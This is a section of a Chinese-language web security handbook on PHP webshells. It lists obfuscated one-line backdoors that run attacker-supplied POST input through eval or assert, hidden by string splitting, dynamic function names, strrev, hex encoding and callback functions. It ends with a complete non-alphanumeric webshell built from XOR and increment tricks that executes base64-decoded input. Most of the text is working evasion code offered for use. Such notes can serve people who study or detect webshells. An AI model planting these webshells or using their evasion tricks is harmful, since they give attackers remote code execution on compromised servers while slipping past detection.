5.1.8. WebShell
5.1.8.1. 常见变形
- GLOBALS
eval($GLOBALS['_POST']['op']);
$_FILE
eval($_FILE['name']);
- 拆分
assert(${"_PO"."ST"} ['sz']);
- 动态函数执行
$k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);
- create_function
$function = createfunction('$code',strrev('lave').'('.strrev('TEG$').'["code"]);');$function();
- preg_replace
- rot13
- base64
- 进制转化
"\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"
- 利用文件名
FILE
5.1.8.2. 字符串变形函数
- ucwords
- ucfirst
- trim
- substr_replace
- substr
- strtr
- strtoupper
- strtolower
- strtok
- str_rot13
5.1.8.3. 回调函数
- call_user_func_array
- call_user_func
- array_filter
- array_walk
- array_map
- registregister_shutdown_function
- register_tick_function
- filter_var
- filter_var_array
- uasort
- uksort
- array_reduce
- array_walk
- array_walk_recursive
5.1.8.4. 特殊字符Shell
PHP的字符串可以在进行异或、自增运算的时候,会直接进行运算,故可以使用特殊字符来构成Shell。
- @$++;$=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$}[!$](${$_}[$]);
- $_=[];
- $_=@"$_"; // $_='Array';
- $_=$_['!'=='@']; // $_=$_[0];
- $___=$_; // A
- $__=$_;
- $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
- $___.=$__; // S
- $___.=$__; // S
- $__=$_;
- $__++;$__++;$__++;$__++; // E
- $___.=$__;
- $__=$_;
- $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
- $___.=$__;
- $__=$_;
- $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
- $___.=$__;
- $____='_';
- $__=$_;
- $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
- $____.=$__;
- $__=$_;
- $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
- $____.=$__;
- $__=$_;
- $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
- $____.=$__;
- $__=$_;
- $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
- $____.=$__;
- $_=$$____;
- $___(base64_decode($_[_]));